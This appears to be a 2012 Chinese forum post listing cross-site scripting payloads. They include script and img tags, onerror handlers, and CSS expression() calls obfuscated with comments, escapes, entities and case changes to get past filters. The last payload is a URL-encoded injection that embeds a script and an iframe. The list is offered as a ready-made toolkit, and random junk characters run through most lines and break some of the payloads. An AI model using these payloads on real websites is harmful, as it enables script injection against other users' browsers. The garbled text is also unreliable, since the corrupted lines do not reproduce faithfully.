<script>alert("跨站")</script> (最常用)
" x9 x; D4 X2 B<img scr=javascript:alert("跨站")></img>: E2 ?9 v; w6 r, ~* @
<img scr="javascript: alert(/跨站/)></img>( q, C0 p, j9 A* {9 u2 {
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)" r3 l4 L h4 y0 Z! Z: h
<img scr="#" onerror=alert(/跨站/)></img>
2 _0 c5 S0 x! j$ S" ~<img scr="#" style="xss:expression(alert(/xss/));"></img>7 ~, U- o/ ^" U- b" E8 J3 `
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)3 Q# }" N/ z1 a) ~2 n
<img src=vbscript:msgbox ("xss")></img>1 w! k3 J) u1 x' d" F; m7 d
<style> input {left:expression (alert('xss'))}</style>
8 H+ {$ ^) I) T' a. d: l<div style={left:expression (alert('xss'))}></div>) m6 H! u% M0 i5 A: h; B" s
<div style={left:exp/* */ression (alert('xss'))}></div>) J F' M) s0 F+ d4 F3 E+ g
<div style={left:\0065\0078ression (alert('xss'))}></div>
: E3 i; |1 ]) g8 bhtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
" ^1 g& D5 v6 x5 ?3 `unicode <div style="{left:expRessioN (alert('xss'))}">) j3 D5 q' e) T3 C
# H7 i6 ^0 U( ?7 v7 O
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>[", W. Y' m# d- m/ e* Q$ a {/ {
|
发表于 2012-9-13 17:15:04
收藏
支持
反对